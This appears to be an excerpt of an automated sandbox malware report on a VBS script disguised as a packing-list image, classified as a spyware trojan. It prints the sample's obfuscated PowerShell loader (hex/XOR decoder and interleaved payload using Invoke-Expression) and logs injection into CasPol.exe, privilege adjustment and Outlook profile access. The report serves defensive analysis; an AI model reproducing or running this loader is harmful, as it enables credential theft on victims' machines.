Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Audiologiskes0 { param([String]$Fllesudgiften); $Otoconite = New-Object byte[] ($Fllesudgiften.Length / 2); For($Familieydelserne=0; $Familieydelserne -lt $Fllesudgiften.Length; $Familieydelserne+=2){ $Otoconite[$Familieydelserne/2] = [convert]::ToByte($Fllesudgiften.Substring($Familieydelserne, 2), 16); $Otoconite[$Familieydelserne/2] = ($Otoconite[$Familieydelserne/2] -bxor 140); } [String][System.Text.Encoding]::ASCII.GetString($Otoconite);}$Nonnegativistic0=Audiologiskes0 'DFF5FFF8E9E1A2E8E0E0';$Nonnegativistic1=Audiologiskes0 'C1E5EFFEE3FFE3EAF8A2DBE5E2BFBEA2D9E2FFEDEAE9C2EDF8E5FAE9C1E9F8E4E3E8FF';$Nonnegativistic2=Audiologiskes0 'CBE9F8DCFEE3EFCDE8E8FEE9FFFF';$Nonnegativistic3=Audiologiskes0 'DFF5FFF8E9E1A2DEF9E2F8E5E1E9A2C5E2F8E9FEE3FCDFE9FEFAE5EFE9FFA2C4EDE2E8E0E9DEE9EA';$Nonnegativistic4=Audiologiskes0 'FFF8FEE5E2EB';$Nonnegativistic5=Audiologiskes0 'CBE9F8C1E3E8F9E0E9C4EDE2E8E0E9';$Nonnegativistic6=Audiologiskes0 'DED8DFFCE9EFE5EDE0C2EDE1E9A0ACC4E5E8E9CEF5DFE5EBA0ACDCF9EEE0E5EF';$Nonnegativistic7=Audiologiskes0 'DEF9E2F8E5E1E9A0ACC1EDE2EDEBE9E8';$Nonnegativistic8=Audiologiskes0 'DEE9EAE0E9EFF8E9E8C8E9E0E9EBEDF8E9';$Nonnegativistic9=Audiologiskes0 'C5E2C1E9E1E3FEF5C1E3E8F9E0E9';$Unshadow0=Audiologiskes0 'C1F5C8E9E0E9EBEDF8E9D8F5FCE9';$Unshadow1=Audiologiskes0 'CFE0EDFFFFA0ACDCF9EEE0E5EFA0ACDFE9EDE0E9E8A0ACCDE2FFE5CFE0EDFFFFA0ACCDF9F8E3CFE0EDFFFF';$Unshadow2=Audiologiskes0 'C5E2FAE3E7E9';$Unshadow3=Audiologiskes0 'DCF9EEE0E5EFA0ACC4E5E8E9CEF5DFE5EBA0ACC2E9FBDFE0E3F8A0ACDAE5FEF8F9EDE0';$Unshadow4=Audiologiskes0 'DAE5FEF8F9EDE0CDE0E0E3EF';$Unshadow5=Audiologiskes0 'E2F8E8E0E0';$Unshadow6=Audiologiskes0 'C2F8DCFEE3F8E9EFF8DAE5FEF8F9EDE0C1E9E1E3FEF5';$Unshadow7=Audiologiskes0 'C5C9D4';$Unshadow8=Audiologiskes0 'D0';function fkp {Param ($Transverses, $Fosslify) ;$Kabelforbindelserne0 =Audiologiskes0 'A8C4EDE2E8FFE3E1E9FFF8ACB1ACA4D7CDFCFCC8E3E1EDE5E2D1B6B6CFF9FEFEE9E2F8C8E3E1EDE5E2A2CBE9F8CDFFFFE9E1EEE0E5E9FFA4A5ACF0ACDBE4E9FEE9A1C3EEE6E9EFF8ACF7ACA8D3A2CBE0E3EEEDE0CDFFFFE9E1EEE0F5CFEDEFE4E9ACA1CDE2E8ACA8D3A2C0E3EFEDF8E5E3E2A2DFFCE0E5F8A4A8D9E2FFE4EDE8E3FBB4A5D7A1BDD1A2C9FDF9EDE0FFA4A8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFBCA5ACF1A5A2CBE9F8D8F5FCE9A4A8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFBDA5';&($Unshadow7) $Kabelforbindelserne0;$Kabelforbindelserne5 = Audiologiskes0 'A8C4E9E5E8E9E1EDEDE2FFACB1ACA8C4EDE2E8FFE3E1E9FFF8A2CBE9F8C1E9F8E4E3E8A4A8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFBEA0ACD7D8F5FCE9D7D1D1ACCCA4A8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFBFA0ACA8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFB8A5A5';&($Unshadow7) $Kabelforbindelserne5;$Kabelforbindelserne1 = Audiologiskes0 'FEE9F8F9FEE2ACA8C4E9E5E8E9E1EDEDE2FFA2C5E2FAE3E7E9A4A8E2F9E0E0A0ACCCA4D7DFF5FFF8E9E1A2DEF9E2F8E5E1E9A2C5E2F8E9FEE3FCDFE9FEFAE5EFE9FFA2C4EDE2E8E0E9DEE9EAD1A4C2E9FBA1C3EEE6E9EFF8ACDFF5FFF8E9E1A2DEF9E2F8E5E1E9A2C5E2F8E9FEE3FCDFE9FEFAE5EFE9FFA2C4EDE2E8E0E9DEE9EAA4A4C2E9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Orthopedists = """UnFDyuSensucIntLoiSyoNunSt JoAThuIndPriploBrlKeoFogBaiDisenkTieAnsle0li Fo{Mu Un Mi Bi PapSlaHorFlaFamSk(fl[DiSRetPrrSaiConalgNa]st`$MaFMalUnlPreSpsSuuSudRegDeiudfRetOpeGgnIl)No;Cu As le Ba Sp`$daOAftReoCicMuoDanEgiSatBleTu En=Be ExNSnePawIn-AdOAmbLajTeeRacRutIn FobNiyTytDeeKe[In]St Id(Ti`$RaFAnlovlApeBlsInuFidUngOriApfTrtAkehunIm.RhLIneRenFlgUntLihko Re/Ln Pe2Op)Ar;Ho Gl Fu Ti ScFLooArrUd(Un`$BeFAnaCrmFaiTrlGriAueSkyTidsqetylIlsileSerTfncyeUn=Me0Fa;Ry Ko`$PrFAraSpmAniHrlAniSpeKryBidOvePrlKosSeeAnrGunSeeMo Mo-ExlTatSt Pe`$CoFBelStlDieHesReuMadcegFeiFyfBitBreRanSs.RiLpaeGinSmgFotOuhOy;Ha Cr`$foFLaaLimEciAflTriBaeInyKodBleAflLascoeYnrHonBreSh+Se=Ra2An)Fo{Un Vi Be ly Tr in Fo Un So`$CiOHatGroIdcGuoTrnFoiNetskeOl[Fi`$KoFChaDemSniDalBaiFoeSmycodSaesklRasIneCarHnnUreDo/Ji2Ve]Fo Hj=Ro Mi[SkcStoUfnRevSueRerwhtTw]Ra:Ri:ExTTaoLsBKaytitDeeSe(Pr`$UnFNelKelHueDesbauFodPlgDaiAbfOptHaeSknch.buShouUlbmasCotRirgeiKonUngEj(Sl`$NaFPraKomVoiShlaniToeSnyEndcyeHalDysJueEvrstnFoekr,Cu fl2Tj)In,ex As1Dr6Fo)Ar;Sy Ja Mu`$BjOCatUdoDicBeoMonRoiRetgleBe[Tr`$GeFekaDamTiiUdlInimieCayOtdVaePolmasCoeCerSpnUneCa/Ko2la]Sm Lu=ev Bu(Mi`$TrOdutploCacNaoSanSaiSutPaeAl[Ly`$BrFleaMimFoiDrlCaiRaeSeyTodDreOblTisCaeKyrRenKaeSt/Ge2Ko]un Cr-BibnexLioMirTe Me1Fl4Re0Sc)Me;Yu Sg De Ca Ko}Ko St[MoSLutEdrTaiTinSigMi]Ta[ReSHeyResTitKoeIdmUn.VaTGreKaxChtbr.UnEeunefcHjoMadEliTanBsgTu]Di:Ly:PoAbiSSaCEtIDrIAf.StGNoeAmtAnSNetAnrSciSknTegMe(Ki`$MeOmetgroUncCroUdnRaiTatSaeSu)Ne;Ch}ln`$MuNAeoShntnnSteNegLuaTetSkiLivMeiInsHotAriIncPr0Bo=FlAGeuStdSaiFroOvlCooSkgsuiFrsLukgreAmsFl0Pr Au'foDSuFLiFTy5GsFPiFDiFPa8MiEHe9SuEIc1ImACa2LiEOv8FaEPr0BaEFr0Wh'At;Dd`$SeNBooAnnfrnUneMegNaaTctSpiAnvMoiOrsUntBaiVvcTr1Mo=AaABiuTidLaiDioDilJuoekgReiAnsNekMaeBosBo0Tr Ri'AnCFi1TeEOc5UfESkFUgFblEAcEHj3RoFVuFBaEta3MiECoAEpFPl8FrATr2FiDUnBUdEBa5LoEGu2VeBUhFSmBPlEbaAAf2SoDLu9UnEEk2CaFStFStESuDUnEFiABaEDe9HyCgo2SiEReDAdFgl8SkEDa5ReFGlAGaEIn9QuCKi1naEPi9UnFSk8PeELi4FoEcm3UnEUk8OxFDiFKo'Pr;He`$ViNMooBunPrnMaeCigPraHitHyiSevPriSdsPotStiKncMo2Un=KlAMiuphdCaiMaoMalSkoUngRiiMnscokStePlsPr0ta Fr'FoCflBUnERa9BrFSt8GrDcaCBeFFuEKlEUd3BiEHaFFrCReDFiEMe8ZyEId8SoFPaEShECo9JgFDiFAxFfoFAa'Un;ur`$PoNSpoHenSenCoeSpgDiaRetSuisovPoiSksFatLaiovcIn3Tr=GaAVauKrdEriPuoColPhoDegStibosPrkPoeAbsUn0Fo sp'FlDFoFFoFFl5DrFAaFOvFSo8FeEDi9MiESe1RiAAf2coDCoESeFTe9VaESi2CaFCo8BoESh5FoEBe1EnETz9GoABl2AnCCa5WoEKo2KoFSy8LiELe9FiFInESiEMa3OvFTeCIsDImFSpERo9MuFPrETaFEfAMaEDu5DeEMiFreEsj9WeFAbFMaAKo2MaCFo4MiEIsDPaEKa2AsEPr8TiEMo0StEOv9biDcrECaEGi9HiEDoACa'Yd;So`$BeNbaoRenMonAfeBigkhaTytPaiInvDriTesistSpiAncKa4Pn=liAThuPsdPiiProFelUnoSegTriHosInkNeeRasPi0Le Sf'TeFbeFSkFGr8MeFReEReECh5ClEHo2KrEFoBRi'Ma;Fo`$SkNUnoEtnconRuegrgMiaXytReihavToiStsCatFoiMocSk5Ga=SrAFuumidGriskoRelDeoSwgTuiAlsTokpreKlsSy0Ar To'FoCmiBFoESc9MaFEt8KvCMe1TaEje3BrESa8CaFJo9ChETa0ByESa9ReCSi4EmEApDFeERa2CoEPh8abEDi0FrEQu9En'Au;To`$SyNOmopenGenEneSagLoaNotUniMevNoiHesE Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Audiologiskes0 { param([String]$Fllesudgiften); $Otoconite = New-Object byte[] ($Fllesudgiften.Length / 2); For($Familieydelserne=0; $Familieydelserne -lt $Fllesudgiften.Length; $Familieydelserne+=2){ $Otoconite[$Familieydelserne/2] = [convert]::ToByte($Fllesudgiften.Substring($Familieydelserne, 2), 16); $Otoconite[$Familieydelserne/2] = ($Otoconite[$Familieydelserne/2] -bxor 140); } [String][System.Text.Encoding]::ASCII.GetString($Otoconite);}$Nonnegativistic0=Audiologiskes0 'DFF5FFF8E9E1A2E8E0E0';$Nonnegativistic1=Audiologiskes0 'C1E5EFFEE3FFE3EAF8A2DBE5E2BFBEA2D9E2FFEDEAE9C2EDF8E5FAE9C1E9F8E4E3E8FF';$Nonnegativistic2=Audiologiskes0 'CBE9F8DCFEE3EFCDE8E8FEE9FFFF';$Nonnegativistic3=Audiologiskes0 'DFF5FFF8E9E1A2DEF9E2F8E5E1E9A2C5E2F8E9FEE3FCDFE9FEFAE5EFE9FFA2C4EDE2E8E0E9DEE9EA';$Nonnegativistic4=Audiologiskes0 'FFF8FEE5E2EB';$Nonnegativistic5=Audiologiskes0 'CBE9F8C1E3E8F9E0E9C4EDE2E8E0E9';$Nonnegativistic6=Audiologiskes0 'DED8DFFCE9EFE5EDE0C2EDE1E9A0ACC4E5E8E9CEF5DFE5EBA0ACDCF9EEE0E5EF';$Nonnegativistic7=Audiologiskes0 'DEF9E2F8E5E1E9A0ACC1EDE2EDEBE9E8';$Nonnegativistic8=Audiologiskes0 'DEE9EAE0E9EFF8E9E8C8E9E0E9EBEDF8E9';$Nonnegativistic9=Audiologiskes0 'C5E2C1E9E1E3FEF5C1E3E8F9E0E9';$Unshadow0=Audiologiskes0 'C1F5C8E9E0E9EBEDF8E9D8F5FCE9';$Unshadow1=Audiologiskes0 'CFE0EDFFFFA0ACDCF9EEE0E5EFA0ACDFE9EDE0E9E8A0ACCDE2FFE5CFE0EDFFFFA0ACCDF9F8E3CFE0EDFFFF';$Unshadow2=Audiologiskes0 'C5E2FAE3E7E9';$Unshadow3=Audiologiskes0 'DCF9EEE0E5EFA0ACC4E5E8E9CEF5DFE5EBA0ACC2E9FBDFE0E3F8A0ACDAE5FEF8F9EDE0';$Unshadow4=Audiologiskes0 'DAE5FEF8F9EDE0CDE0E0E3EF';$Unshadow5=Audiologiskes0 'E2F8E8E0E0';$Unshadow6=Audiologiskes0 'C2F8DCFEE3F8E9EFF8DAE5FEF8F9EDE0C1E9E1E3FEF5';$Unshadow7=Audiologiskes0 'C5C9D4';$Unshadow8=Audiologiskes0 'D0';function fkp {Param ($Transverses, $Fosslify) ;$Kabelforbindelserne0 =Audiologiskes0 'A8C4EDE2E8FFE3E1E9FFF8ACB1ACA4D7CDFCFCC8E3E1EDE5E2D1B6B6CFF9FEFEE9E2F8C8E3E1EDE5E2A2CBE9F8CDFFFFE9E1EEE0E5E9FFA4A5ACF0ACDBE4E9FEE9A1C3EEE6E9EFF8ACF7ACA8D3A2CBE0E3EEEDE0CDFFFFE9E1EEE0F5CFEDEFE4E9ACA1CDE2E8ACA8D3A2C0E3EFEDF8E5E3E2A2DFFCE0E5F8A4A8D9E2FFE4EDE8E3FBB4A5D7A1BDD1A2C9FDF9EDE0FFA4A8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFBCA5ACF1A5A2CBE9F8D8F5FCE9A4A8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFBDA5';&($Unshadow7) $Kabelforbindelserne0;$Kabelforbindelserne5 = Audiologiskes0 'A8C4E9E5E8E9E1EDEDE2FFACB1ACA8C4EDE2E8FFE3E1E9FFF8A2CBE9F8C1E9F8E4E3E8A4A8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFBEA0ACD7D8F5FCE9D7D1D1ACCCA4A8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFBFA0ACA8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFB8A5A5';&($Unshadow7) $Kabelforbindelserne5;$Kabelforbindelserne1 = Audiologiskes0 'FEE9F8F9FEE2ACA8C4E9E5E8E9E1EDEDE2FFA2C5E2FAE3E7E9A4A8E2F9E0E0A0ACCCA4D7DFF5FFF8E9E1A2DEF9E2F8E5E1E9A2C5E2F8E9FEE3FCDFE9FEFAE5EFE9FFA2C4EDE2E8E0E9DEE9EAD1A4C2E9FBA1C3EEE6E9EFF8ACDFF5FFF8E9E1A2DEF9E2F8E5E1E9A2C5E2F8E9FEE3FCDFE9FEFAE5EFE9FFA2C4EDE2E8E0E9DEE9EAA4A4C2E9 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_1D4AAAB6 AdjustTokenPrivileges, 8_2_1D4AAAB6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_1D4AAA7F AdjustTokenPrivileges, 8_2_1D4AAA7F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_koy4z1rg.3tk.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@7/4@3/3
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:304:WilStaging_02
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Packing list ASPL22-23-1504_jpg.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior

Data Obfuscation
barindex
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Orthopedists = """UnFDyuSensucIntLoiSyoNunSt JoAThuIndPriploBrlKeoFogBaiDisenkTieAnsle0li Fo{Mu Un Mi Bi PapSlaHorFlaFamSk(fl[DiSRetPrrSaiConalgNa]st`$MaFMalUnlPreSpsSuuSudRegDeiudfRetOpeGgnIl)No;Cu As le Ba Sp`$daOAftReoCicMuoDanEgiSatBleTu En=Be ExNSnePawIn-AdOAmbLajTeeRacRutIn FobNiyTytDeeKe[In]St Id(Ti`$RaFAnlovlApeBlsInuFidUngOriApfTrtAkehunIm.RhLIneRenFlgUntLihko Re/Ln Pe2Op)Ar;Ho Gl Fu Ti ScFLooArrUd(Un`$BeFAnaCrmFaiTrlGriAueSkyTidsqetylIlsileSerTfncyeUn=Me0Fa;Ry Ko`$PrFAraSpmAniHrlAniSpeKryBidOvePrlKosSeeAnrGunSeeMo Mo-ExlTatSt Pe`$CoFBelStlDieHesReuMadcegFeiFyfBitBreRanSs.RiLpaeGinSmgFotOuhOy;Ha Cr`$foFLaaLimEciAflTriBaeInyKodBleAflLascoeYnrHonBreSh+Se=Ra2An)Fo{Un Vi Be ly Tr in Fo Un So`$CiOHatGroIdcGuoTrnFoiNetskeOl[Fi`$KoFChaDemSniDalBaiFoeSmycodSaesklRasIneCarHnnUreDo/Ji2Ve]Fo Hj=Ro Mi[SkcStoUfnRevSueRerwhtTw]Ra:Ri:ExTTaoLsBKaytitDeeSe(Pr`$UnFNelKelHueDesbauFodPlgDaiAbfOptHaeSknch.buShouUlbmasCotRirgeiKonUngEj(Sl`$NaFPraKomVoiShlaniToeSnyEndcyeHalDysJueEvrstnFoekr,Cu fl2Tj)In,ex As1Dr6Fo)Ar;Sy Ja Mu`$BjOCatUdoDicBeoMonRoiRetgleBe[Tr`$GeFekaDamTiiUdlInimieCayOtdVaePolmasCoeCerSpnUneCa/Ko2la]Sm Lu=ev Bu(Mi`$TrOdutploCacNaoSanSaiSutPaeAl[Ly`$BrFleaMimFoiDrlCaiRaeSeyTodDreOblTisCaeKyrRenKaeSt/Ge2Ko]un Cr-BibnexLioMirTe Me1Fl4Re0Sc)Me;Yu Sg De Ca Ko}Ko St[MoSLutEdrTaiTinSigMi]Ta[ReSHeyResTitKoeIdmUn.VaTGreKaxChtbr.UnEeunefcHjoMadEliTanBsgTu]Di:Ly:PoAbiSSaCEtIDrIAf.StGNoeAmtAnSNetAnrSciSknTegMe(Ki`$MeOmetgroUncCroUdnRaiTatSaeSu)Ne;Ch}ln`$MuNAeoShntnnSteNegLuaTetSkiLivMeiInsHotAriIncPr0Bo=FlAGeuStdSaiFroOvlCooSkgsuiFrsLukgreAmsFl0Pr Au'foDSuFLiFTy5GsFPiFDiFPa8MiEHe9SuEIc1ImACa2LiEOv8FaEPr0BaEFr0Wh'At;Dd`$SeNBooAnnfrnUneMegNaaTctSpiAnvMoiOrsUntBaiVvcTr1Mo=AaABiuTidLaiDioDilJuoekgReiAnsNekMaeBosBo0Tr Ri'AnCFi1TeEOc5UfESkFUgFblEAcEHj3RoFVuFBaEta3MiECoAEpFPl8FrATr2FiDUnBUdEBa5LoEGu2VeBUhFSmBPlEbaAAf2SoDLu9UnEEk2CaFStFStESuDUnEFiABaEDe9HyCgo2SiEReDAdFgl8SkEDa5ReFGlAGaEIn9QuCKi1naEPi9UnFSk8PeELi4FoEcm3UnEUk8OxFDiFKo'Pr;He`$ViNMooBunPrnMaeCigPraHitHyiSevPriSdsPotStiKncMo2Un=KlAMiuphdCaiMaoMalSkoUngRiiMnscokStePlsPr0ta Fr'FoCflBUnERa9BrFSt8GrDcaCBeFFuEKlEUd3BiEHaFFrCReDFiEMe8ZyEId8SoFPaEShECo9JgFDiFAxFfoFAa'Un;ur`$PoNSpoHenSenCoeSpgDiaRetSuisovPoiSksFatLaiovcIn3Tr=GaAVauKrdEriPuoColPhoDegStibosPrkPoeAbsUn0Fo sp'FlDFoFFoFFl5DrFAaFOvFSo8FeEDi9MiESe1RiAAf2coDCoESeFTe9VaESi2CaFCo8BoESh5FoEBe1EnETz9GoABl2AnCCa5WoEKo2KoFSy8LiELe9FiFInESiEMa3OvFTeCIsDImFSpERo9MuFPrETaFEfAMaEDu5DeEMiFreEsj9WeFAbFMaAKo2MaCFo4MiEIsDPaEKa2AsEPr8TiEMo0StEOv9biDcrECaEGi9HiEDoACa'Yd;So`$BeNbaoRenMonAfeBigkhaTytPaiInvDriTesistSpiAncKa4Pn=liAThuPsdPiiProFelUnoSegTriHosInkNeeRasPi0Le Sf'TeFbeFSkFGr8MeFReEReECh5ClEHo2KrEFoBRi'Ma;Fo`$SkNUnoEtnconRuegrgMiaXytReihavToiStsCatFoiMocSk5Ga=SrAFuumidGriskoRelDeoSwgTuiAlsTokpreKlsSy0Ar To'FoCmiBFoESc9MaFEt8KvCMe1TaEje3BrESa8CaFJo9ChETa0ByESa9ReCSi4EmEApDFeERa2CoEPh8abEDi0FrEQu9En'Au;To`$SyNOmopenGenEneSagLoaNotUniMevNoiHesE
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Orthopedists = """UnFDyuSensucIntLoiSyoNunSt JoAThuIndPriploBrlKeoFogBaiDisenkTieAnsle0li Fo{Mu Un Mi Bi PapSlaHorFlaFamSk(fl[DiSRetPrrSaiConalgNa]st`$MaFMalUnlPreSpsSuuSudRegDeiudfRetOpeGgnIl)No;Cu As le Ba Sp`$daOAftReoCicMuoDanEgiSatBleTu En=Be ExNSnePawIn-AdOAmbLajTeeRacRutIn FobNiyTytDeeKe[In]St Id(Ti`$RaFAnlovlApeBlsInuFidUngOriApfTrtAkehunIm.RhLIneRenFlgUntLihko Re/Ln Pe2Op)Ar;Ho Gl Fu Ti ScFLooArrUd(Un`$BeFAnaCrmFaiTrlGriAueSkyTidsqetylIlsileSerTfncyeUn=Me0Fa;Ry Ko`$PrFAraSpmAniHrlAniSpeKryBidOvePrlKosSeeAnrGunSeeMo Mo-ExlTatSt Pe`$CoFBelStlDieHesReuMadcegFeiFyfBitBreRanSs.RiLpaeGinSmgFotOuhOy;Ha Cr`$foFLaaLimEciAflTriBaeInyKodBleAflLascoeYnrHonBreSh+Se=Ra2An)Fo{Un Vi Be ly Tr in Fo Un So`$CiOHatGroIdcGuoTrnFoiNetskeOl[Fi`$KoFChaDemSniDalBaiFoeSmycodSaesklRasIneCarHnnUreDo/Ji2Ve]Fo Hj=Ro Mi[SkcStoUfnRevSueRerwhtTw]Ra:Ri:ExTTaoLsBKaytitDeeSe(Pr`$UnFNelKelHueDesbauFodPlgDaiAbfOptHaeSknch.buShouUlbmasCotRirgeiKonUngEj(Sl`$NaFPraKomVoiShlaniToeSnyEndcyeHalDysJueEvrstnFoekr,Cu fl2Tj)In,ex As1Dr6Fo)Ar;Sy Ja Mu`$BjOCatUdoDicBeoMonRoiRetgleBe[Tr`$GeFekaDamTiiUdlInimieCayOtdVaePolmasCoeCerSpnUneCa/Ko2la]Sm Lu=ev Bu(Mi`$TrOdutploCacNaoSanSaiSutPaeAl[Ly`$BrFleaMimFoiDrlCaiRaeSeyTodDreOblTisCaeKyrRenKaeSt/Ge2Ko]un Cr-BibnexLioMirTe Me1Fl4Re0Sc)Me;Yu Sg De Ca Ko}Ko St[MoSLutEdrTaiTinSigMi]Ta[ReSHeyResTitKoeIdmUn.VaTGreKaxChtbr.UnEeunefcHjoMadEliTanBsgTu]Di:Ly:PoAbiSSaCEtIDrIAf.StGNoeAmtAnSNetAnrSciSknTegMe(Ki`$MeOmetgroUncCroUdnRaiTatSaeSu)Ne;Ch}ln`$MuNAeoShntnnSteNegLuaTetSkiLivMeiInsHotAriIncPr0Bo=FlAGeuStdSaiFroOvlCooSkgsuiFrsLukgreAmsFl0Pr Au'foDSuFLiFTy5GsFPiFDiFPa8MiEHe9SuEIc1ImACa2LiEOv8FaEPr0BaEFr0Wh'At;Dd`$SeNBooAnnfrnUneMegNaaTctSpiAnvMoiOrsUntBaiVvcTr1Mo=AaABiuTidLaiDioDilJuoekgReiAnsNekMaeBosBo0Tr Ri'AnCFi1TeEOc5UfESkFUgFblEAcEHj3RoFVuFBaEta3MiECoAEpFPl8FrATr2FiDUnBUdEBa5LoEGu2VeBUhFSmBPlEbaAAf2SoDLu9UnEEk2CaFStFStESuDUnEFiABaEDe9HyCgo2SiEReDAdFgl8SkEDa5ReFGlAGaEIn9QuCKi1naEPi9UnFSk8PeELi4FoEcm3UnEUk8OxFDiFKo'Pr;He`$ViNMooBunPrnMaeCigPraHitHyiSevPriSdsPotStiKncMo2Un=KlAMiuphdCaiMaoMalSkoUngRiiMnscokStePlsPr0ta Fr'FoCflBUnERa9BrFSt8GrDcaCBeFFuEKlEUd3BiEHaFFrCReDFiEMe8ZyEId8SoFPaEShECo9JgFDiFAxFfoFAa'Un;ur`$PoNSpoHenSenCoeSpgDiaRetSuisovPoiSksFatLaiovcIn3Tr=GaAVauKrdEriPuoColPhoDegStibosPrkPoeAbsUn0Fo sp'FlDFoFFoFFl5DrFAaFOvFSo8FeEDi9MiESe1RiAAf2coDCoESeFTe9VaESi2CaFCo8BoESh5FoEBe1EnETz9GoABl2AnCCa5WoEKo2KoFSy8LiELe9FiFInESiEMa3OvFTeCIsDImFSpERo9MuFPrETaFEfAMaEDu5DeEMiFreEsj9WeFAbFMaAKo2MaCFo4MiEIsDPaEKa2AsEPr8TiEMo0StEOv9biDcrECaEGi9HiEDoACa'Yd;So`$BeNbaoRenMonAfeBigkhaTytPaiInvDriTesistSpiAncKa4Pn=liAThuPsdPiiProFelUnoSegTriHosInkNeeRasPi0Le Sf'TeFbeFSkFGr8MeFReEReECh5ClEHo2KrEFoBRi'Ma;Fo`$SkNUnoEtnconRuegrgMiaXytReihavToiStsCatFoiMocSk5Ga=SrAFuumidGriskoRelDeoSwgTuiAlsTokpreKlsSy0Ar To'FoCmiBFoESc9MaFEt8KvCMe1TaEje3BrESa8CaFJo9ChETa0ByESa9ReCSi4EmEApDFeERa2CoEPh8abEDi0FrEQu9En'Au;To`$SyNOmopenGenEneSagLoaNotUniMevNoiHesE Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF912FF00BD pushad ; iretd 3_2_00007FF912FF00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF912FF2313 pushad ; iretd 3_2_00007FF912FF232D
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
